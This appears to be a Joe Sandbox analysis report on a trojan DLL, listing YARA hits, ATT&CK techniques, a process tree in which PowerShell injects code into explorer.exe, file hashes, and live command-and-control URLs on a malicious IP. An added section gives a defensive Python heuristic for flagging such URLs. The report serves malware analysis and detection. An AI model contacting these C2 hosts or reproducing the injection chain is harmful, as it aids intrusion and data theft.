Source: explorer.exe, 00000021.00000000.408252291.0000000005E60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000021.00000000.379131274.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000021.00000000.408234525.0000000005610000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000021.00000000.400441587.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000000.379131274.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000021.00000000.421471137.0000000000B50000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
Source: explorer.exe, 00000021.00000000.379131274.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000021.00000000.421471137.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000021.00000000.400760841.0000000000B50000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager,
Source: explorer.exe, 00000021.00000000.379131274.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000021.00000000.421471137.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000021.00000000.400760841.0000000000B50000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_049F12D3 cpuid
Source: C:\Windows\SysWOW64\rundll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_05804DF5 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_049F5410 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_049F515F CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_049F12D3 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

Stealing of Sensitive Information

Source: Yara match | File source: 00000002.00000003.260779553.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.308220825.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.260884971.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.309153947.0000000004D7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.306041676.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.261032532.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.261191379.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.260987111.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.261105592.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000018.00000003.369967418.000001909FD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.261071181.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.365233310.0000000005D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.261177888.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 5292, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 6612, type: MEMORYSTR
Source: Yara match | File source: 2.3.rundll32.exe.48994a0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.rundll32.exe.49f0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.rundll32.exe.48994a0.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.rundll32.exe.4e7a4a0.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.rundll32.exe.4f26940.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.rundll32.exe.4ef94a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.rundll32.exe.4e7a4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.307999471.0000000004EF9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.418290264.0000000004899000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.307957841.0000000004E7A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.420929959.0000000004BFF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match | File source: 00000002.00000003.260779553.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.308220825.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.260884971.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.309153947.0000000004D7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.306041676.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.261032532.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.261191379.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.260987111.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.261105592.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000018.00000003.369967418.000001909FD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.261071181.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.365233310.0000000005D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.261177888.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 5292, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 6612, type: MEMORYSTR
Source: Yara match | File source: 2.3.rundll32.exe.48994a0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.rundll32.exe.49f0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.rundll32.exe.48994a0.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.rundll32.exe.4e7a4a0.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.rundll32.exe.4f26940.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.rundll32.exe.4ef94a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.rundll32.exe.4e7a4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.307999471.0000000004EF9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.418290264.0000000004899000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.307957841.0000000004E7A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.420929959.0000000004BFF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
MITRE ATT&CK Matrix

Techniques matched by this sample, grouped by tactic; the number in parentheses is the count of matching signatures shown in the matrix cell. The remaining cells of the rendered matrix (the mobile and non-Windows techniques such as Cron, Launchd, SIM Card Swap or Exploit SS7) are the unmatched ATT&CK background and carry no count.

Initial Access: Valid Accounts (1)
Execution: Windows Management Instrumentation (1); Native API (3); Command and Scripting Interpreter (1)
Persistence: Valid Accounts (1)
Privilege Escalation: Valid Accounts (1); Access Token Manipulation (1); Process Injection (413)
Defense Evasion: Obfuscated Files or Information (1); File Deletion (1); Masquerading (1); Valid Accounts (1); Access Token Manipulation (1); Virtualization/Sandbox Evasion (31); Process Injection (413); Rundll32 (1)
Credential Access: no technique matched
Discovery: System Time Discovery (1); Account Discovery (1); File and Directory Discovery (3); System Information Discovery (25); Query Registry (1); Security Software Discovery (11); Virtualization/Sandbox Evasion (31); Process Discovery (3); Application Window Discovery (1); System Owner/User Discovery (1); Remote System Discovery (11); System Network Configuration Discovery (1)
Lateral Movement: no technique matched
Collection: Archive Collected Data (11); Email Collection (1)
Exfiltration: no technique matched
Command and Control: Ingress Tool Transfer (2); Encrypted Channel (2); Non-Application Layer Protocol (1); Application Layer Protocol (11)
Network Effects, Remote Service Effects: no technique matched
Impact: Data Encrypted for Impact (1)
Behavior Graph (ID 614287, sample VoevdOQpeU.dll, start date 23/04/2022, architecture WINDOWS, score 100)

Signatures attached to the root node: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Multi AV Scanner detection for submitted file; 8 other signatures.

Process tree recovered from the graph. The numbers in parentheses are the counts the graph shows next to each node (created registry values and created files, per the graph legend); "injected" marks a process that the sample did not start but wrote code into.

mshta.exe (19)
  powershell.exe (33): Injects code into the Windows Explorer (explorer.exe); Writes to foreign memory regions; Creates a thread in another existing process (thread injection)
    explorer.exe [injected]: Self deletion via cmd delete
      cmd.exe: Uses ping.exe to sleep; Uses ping.exe to check the status of other devices and networks
        PING.EXE -> 192.168.2.1 (unknown, unknown)
        conhost.exe
    csc.exe (3) -> dropped C:\Users\user\AppData\Local\...\poet0yxq.dll (PE32)
      cvtres.exe (1)
    csc.exe (3) -> dropped C:\Users\user\AppData\Local\...\bscdh0f0.dll (PE32)
      cvtres.exe (1)
    conhost.exe
loaddll32.exe (1)
  cmd.exe (1)
    rundll32.exe (1, 6): System process connects to network (likely due to code injection or exploit); Writes to foreign memory regions; Writes registry values via WMI
      146.70.35.138 port 80 (local port 49766), TENET-1ZA, United Kingdom
      control.exe (1)
        rundll32.exe
  WerFault.exe (6, 9)
  WerFault.exe (2, 9)
  WerFault.exe

Initial sample (Source | Detection | Scanner | Label):
VoevdOQpeU.dll | 38% | ReversingLabs | Win32.Trojan.Lazy
VoevdOQpeU.dll | 100% | Joe Sandbox ML |

Dropped files: No Antivirus matches

Unpacked PE files (Source | Detection | Scanner | Label | Link):
2.2.rundll32.exe.49f0000.0.unpack | 100% | Avira | HEUR/AGEN.1245293 | Download File

Domains: No Antivirus matches

URLs (Source | Detection | Scanner | Label):
http://146.70.35.138/phpadmin/Vo3V1ij8xfQAzbYEppxuGj/YfKBcB_2BiFsK/C5o_2FK1/LFX_2FAQmA1J0Gg2IGK0zii/Cqu4J51vDj/wlNBNCb18BPgk55aw/3DJofkjbHHw_/2F3O9t6XtUN/FhzyouLiXCH4qy/e6m_2F6Bp87emTDJkwB0B/GJSc0pfzfjLvMKIS/Fcz1B6FomHVea2H/3F6nRjbT0qghS0NNIb/kfO6CmRa0/E8U4GDXz2DXZU_2BDOzp/T84va5G8JnhB3/UMJfQ.src | 0% | Avira URL Cloud | safe
http://https://file://USER.ID%lu.exe/upd | 0% | Avira URL Cloud | safe
http://146.70.35.138/phpadmin/DRUYboFifxi6C3/_2BjVEcKiT1b8A_2BvMed/1ckh5D3V8MdKp2S2/SxMBQuJjSXDeW9Y/7fodbbXY21Jrsa2aXJ/S90Gqb_2B/KDYz_2F5NJsyx14KqPKz/ecUQVATr13lzZyN_2B_/2BoLTTXT06dmMNQURoEaga/M1AdtgAQJw1vj/q_2FSYWg/oo4zTjJDuzf2mz8BRfV3I9z/TX7m3RhRWd/LYr8gkK9WgmQ0jja9/kmBHLi0WTs_2/FFd4Km9NmRn/_2FUZ.src | 0% | Avira URL Cloud | safe
http://constitution.org/usdeclar.txt | 0% | URL Reputation | safe
http://146.70.35.138/phpadmin/GVoID0TbPRvLYlr7up2X9/gD2XQvRshzT0oIvQ/0mEtVI_2FJuzvKC/fbaZh1y3_2FnOqy8_2/B0Y8u0dqv/V11JJbfZHGLCQ043KVhZ/2j3FiaSLUSAIqnVTtEF/p_2F7mTRIgp_2F43j86HIJ/7JamWIlhMtaxW/Qv_2BsMI/GK_2BjMae66_2B0eWRxZare/pyglkGar6g/LD_2FkUNwRZVbFFyN/qmaS1_2FZd3W/iyocOp4EpCY/lkbOHJ4rs/yFlR4ppeN_2/FAS.src | 0% | Avira URL Cloud | safe
http://constitution.org/usdeclar.txtC: | 0% | URL Reputation | safe
                      No contacted domains info
Contacted URLs (Name | Malicious | Antivirus Detection | Reputation):
http://146.70.35.138/phpadmin/Vo3V1ij8xfQAzbYEppxuGj/YfKBcB_2BiFsK/C5o_2FK1/LFX_2FAQmA1J0Gg2IGK0zii/Cqu4J51vDj/wlNBNCb18BPgk55aw/3DJofkjbHHw_/2F3O9t6XtUN/FhzyouLiXCH4qy/e6m_2F6Bp87emTDJkwB0B/GJSc0pfzfjLvMKIS/Fcz1B6FomHVea2H/3F6nRjbT0qghS0NNIb/kfO6CmRa0/E8U4GDXz2DXZU_2BDOzp/T84va5G8JnhB3/UMJfQ.src | true | Avira URL Cloud: safe | unknown
http://146.70.35.138/phpadmin/DRUYboFifxi6C3/_2BjVEcKiT1b8A_2BvMed/1ckh5D3V8MdKp2S2/SxMBQuJjSXDeW9Y/7fodbbXY21Jrsa2aXJ/S90Gqb_2B/KDYz_2F5NJsyx14KqPKz/ecUQVATr13lzZyN_2B_/2BoLTTXT06dmMNQURoEaga/M1AdtgAQJw1vj/q_2FSYWg/oo4zTjJDuzf2mz8BRfV3I9z/TX7m3RhRWd/LYr8gkK9WgmQ0jja9/kmBHLi0WTs_2/FFd4Km9NmRn/_2FUZ.src | true | Avira URL Cloud: safe | unknown
http://146.70.35.138/phpadmin/GVoID0TbPRvLYlr7up2X9/gD2XQvRshzT0oIvQ/0mEtVI_2FJuzvKC/fbaZh1y3_2FnOqy8_2/B0Y8u0dqv/V11JJbfZHGLCQ043KVhZ/2j3FiaSLUSAIqnVTtEF/p_2F7mTRIgp_2F43j86HIJ/7JamWIlhMtaxW/Qv_2BsMI/GK_2BjMae66_2B0eWRxZare/pyglkGar6g/LD_2FkUNwRZVbFFyN/qmaS1_2FZd3W/iyocOp4EpCY/lkbOHJ4rs/yFlR4ppeN_2/FAS.src | true | Avira URL Cloud: safe | unknown

URLs found in memory (Name | Source | Malicious | Antivirus Detection | Reputation):
http://https://file://USER.ID%lu.exe/upd | rundll32.exe, 00000002.00000003.365233310.0000000005D78000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000003.369967418.000001909FD9C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
http://constitution.org/usdeclar.txt | rundll32.exe, 00000002.00000003.365233310.0000000005D78000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000003.369967418.000001909FD9C000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://constitution.org/usdeclar.txtC: | rundll32.exe, 00000002.00000003.365233310.0000000005D78000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000003.369967418.000001909FD9C000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
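The three contacted URLs share one shape: an IP-literal host, a fixed directory (/phpadmin/), a long run of path segments drawn only from [A-Za-z0-9_] with embedded _2B and _2F tokens, and a short .src filename at the end. Avira URL Cloud rates all three "safe", which is the expected result for freshly generated paths and is why a reputation lookup alone does not help here. The following Python is an added example, not tooling from the report: it scores URLs on that shape and, on the editor's assumption (not stated anywhere in the report) that _2B and _2F stand in for the base64 characters + and / and that the slashes were inserted into one encoded stream, joins the segments back together and checks that the result uses only the base64 alphabet. The sample list is copied from the report's URL tables; the restored stream is not decoded further.

```python
"""Added example (not part of the Joe Sandbox report): shape heuristic for the
C2 URLs in the report's URL table. Reading '_2B' and '_2F' as stand-ins for
the base64 characters '+' and '/' is the editor's assumption."""
import re
from dataclasses import dataclass
from urllib.parse import urlsplit

# URLs copied from the report's tables: three flagged malicious, two not.
SAMPLE_URLS = [
    "http://146.70.35.138/phpadmin/Vo3V1ij8xfQAzbYEppxuGj/YfKBcB_2BiFsK/C5o_2FK1/LFX_2FAQmA1J0Gg2IGK0zii/Cqu4J51vDj/wlNBNCb18BPgk55aw/3DJofkjbHHw_/2F3O9t6XtUN/FhzyouLiXCH4qy/e6m_2F6Bp87emTDJkwB0B/GJSc0pfzfjLvMKIS/Fcz1B6FomHVea2H/3F6nRjbT0qghS0NNIb/kfO6CmRa0/E8U4GDXz2DXZU_2BDOzp/T84va5G8JnhB3/UMJfQ.src",
    "http://146.70.35.138/phpadmin/DRUYboFifxi6C3/_2BjVEcKiT1b8A_2BvMed/1ckh5D3V8MdKp2S2/SxMBQuJjSXDeW9Y/7fodbbXY21Jrsa2aXJ/S90Gqb_2B/KDYz_2F5NJsyx14KqPKz/ecUQVATr13lzZyN_2B_/2BoLTTXT06dmMNQURoEaga/M1AdtgAQJw1vj/q_2FSYWg/oo4zTjJDuzf2mz8BRfV3I9z/TX7m3RhRWd/LYr8gkK9WgmQ0jja9/kmBHLi0WTs_2/FFd4Km9NmRn/_2FUZ.src",
    "http://146.70.35.138/phpadmin/GVoID0TbPRvLYlr7up2X9/gD2XQvRshzT0oIvQ/0mEtVI_2FJuzvKC/fbaZh1y3_2FnOqy8_2/B0Y8u0dqv/V11JJbfZHGLCQ043KVhZ/2j3FiaSLUSAIqnVTtEF/p_2F7mTRIgp_2F43j86HIJ/7JamWIlhMtaxW/Qv_2BsMI/GK_2BjMae66_2B0eWRxZare/pyglkGar6g/LD_2FkUNwRZVbFFyN/qmaS1_2FZd3W/iyocOp4EpCY/lkbOHJ4rs/yFlR4ppeN_2/FAS.src",
    "http://https://file://USER.ID%lu.exe/upd",
    "http://constitution.org/usdeclar.txt",
]

IPV4_RE = re.compile(r"(?:\d{1,3}\.){3}\d{1,3}")
SEG_RE = re.compile(r"[A-Za-z0-9_]+")
B64_RE = re.compile(r"[A-Za-z0-9+/]+={0,2}")


@dataclass
class Verdict:
    url: str
    suspicious: bool
    ipv4_host: bool
    segments: int
    restored: str          # segments joined, _2B/_2F mapped back (assumption)
    base64_alphabet: bool  # restored string uses only base64 characters


def classify(url, min_segments=5):
    """Score one URL on the shape seen in the report's C2 traffic."""
    parts = urlsplit(url)
    segs = [s for s in parts.path.split("/") if s]
    ipv4_host = bool(IPV4_RE.fullmatch(parts.hostname or ""))
    if len(segs) < min_segments:
        return Verdict(url, False, ipv4_host, len(segs), "", False)
    # Drop the leading directory ("phpadmin") and the extension of the last
    # segment; the rest is treated as one stream that was cut into segments
    # by inserted slashes (an _2F token can straddle a slash, so join first).
    last = segs[-1].rsplit(".", 1)[0] if "." in segs[-1] else segs[-1]
    payload = segs[1:-1] + [last]
    opaque = all(SEG_RE.fullmatch(s) for s in payload)
    joined = "".join(payload)
    has_sub = "_2B" in joined or "_2F" in joined
    restored = joined.replace("_2B", "+").replace("_2F", "/")
    base64_ok = bool(B64_RE.fullmatch(restored))
    suspicious = ipv4_host and opaque and has_sub
    return Verdict(url, suspicious, ipv4_host, len(segs), restored, base64_ok)


def suspicious_urls(urls):
    """URLs from the list that match the shape heuristic, in input order."""
    return [v.url for v in map(classify, urls) if v.suspicious]


if __name__ == "__main__":
    for v in map(classify, SAMPLE_URLS):
        print(f"{'FLAG' if v.suspicious else 'ok  '} segs={v.segments:2} "
              f"b64={v.base64_alphabet} {v.url[:60]}")
```

The heuristic deliberately does not key on the /phpadmin/ directory or the .src extension, both of which a campaign can change per build; the IP-literal host, the opaque segment alphabet and the substitution tokens are what survive. A Suricata or proxy rule built from the same three properties will fire on the next path the implant generates, which a reputation feed cannot.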
Contacted IPs (IP | Domain | Country | ASN | ASN Name | Malicious):
146.70.35.138 | unknown | United Kingdom | 2018 | TENET-1ZA | true

Private IPs:
192.168.2.1
Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 614287
Start date and time: 2022-04-23 08:10:43 +02:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 12m 16s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: VoevdOQpeU.dll
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 43
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winDLL@29/23@0/2
                      EGA Information:
                      • Successful, ratio: 66.7%
                      HDC Information:
                      • Successful, ratio: 21% (good quality ratio 19.9%)
                      • Quality average: 80.7%
                      • Quality standard deviation: 28.6%
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 0
                      • Number of non-executed functions: 0
                      Cookbook Comments:
                      • Found application associated with file extension: .dll
                      • Adjust boot time
                      • Enable AMSI
                      • Override analysis time to 240s for rundll32
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                      • TCP Packets have been reduced to 100
                      • Excluded IPs from analysis (whitelisted): 13.107.42.16, 20.189.173.21, 52.168.117.173
                      • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, fs.microsoft.com, config.edge.skype.com.trafficmanager.net, arc.msn.com, store-images.s-microsoft.com, login.live.com, l-0007.config.skype.com, config-edge-skype.l-0007.l-msedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, l-0007.l-msedge.net, config.edge.skype.com
• Execution Graph export aborted for target mshta.exe, PID 6532 because there are no executed functions
• Not all processes were analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description
08:11:55 | API Interceptor | 1x Sleep call for process: rundll32.exe modified
08:12:10 | API Interceptor | 2x Sleep call for process: WerFault.exe modified
08:12:34 | API Interceptor | 41x Sleep call for process: powershell.exe modified
                      Process:C:\Windows\SysWOW64\WerFault.exe
                      File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):65536
                      Entropy (8bit):0.8484271078729315
                      Encrypted:false
                      SSDEEP:96:8xnXzFGeUnYyQy9haot7Jn4pXIQcQac6pcEccw35+a+z+HbHg+AS/YyNlISWbSmH:8RzoneH0tGtjLq/u7sZS274ItW
                      MD5:AC7F4345BC16B046B4BD7A4B49FAD9DE
                      SHA1:31DB96A77E8C9352345D2D35BDD922C5A989733E
                      SHA-256:0FE9F258A2E001391DD7FE936ED71F39F02E4A21502048E07AD9AFF57D5D9B8A
                      SHA-512:F029D90D1FE667A52F3ECD173F11501CA11E15159116660080259EA0F562063CD60BA96DEE65A25CC56E7BBCED3D62E93FDE77354CFF4B959ABF6E7EDDC92DC6
                      Malicious:false
                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.9.5.1.6.7.9.2.6.8.6.4.1.0.0.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.9.5.1.6.7.9.2.9.5.6.7.2.1.0.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.7.2.4.1.b.1.9.-.9.c.1.3.-.4.6.3.b.-.a.9.b.d.-.4.a.9.5.3.6.d.5.a.3.2.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.1.2.f.1.2.6.9.-.a.2.3.4.-.4.9.c.1.-.a.a.e.4.-.4.e.4.1.7.5.a.d.7.b.a.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.5.9.4.-.0.0.0.1.-.0.0.1.c.-.6.f.9.9.-.5.e.0.5.d.9.5.6.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.
                      Process:C:\Windows\SysWOW64\WerFault.exe
                      File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):65536
                      Entropy (8bit):0.8450263074663521
                      Encrypted:false
                      SSDEEP:96:86XqFfeUnYyGy9haTKzfopXIQcQac6FcElcw3d+a+z+HbHg+AS/YyNlISWbSm9mK:8aqFnoHEBPBjLq/u7sZS274ItW
                      MD5:E3453784F5987FFC4297D68B3E5806EC
                      SHA1:8AE5D7F0D9E1EDD426FD57793895BF06C7D55090
                      SHA-256:A19FAA5C0A3344576E5CA6B3D224AF727B5260220821BFD197D80F502CC5D9FC
                      SHA-512:FEDF432EFCB2E02D4F617DBEC17EFD457DA47CE6D4AC7040046C4696A1CB7D78E1D2F57F0E7E44C6B2E4ADFDD4B1900F4350B8B0DFCFE51F01448A96D011F5D8
                      Malicious:false
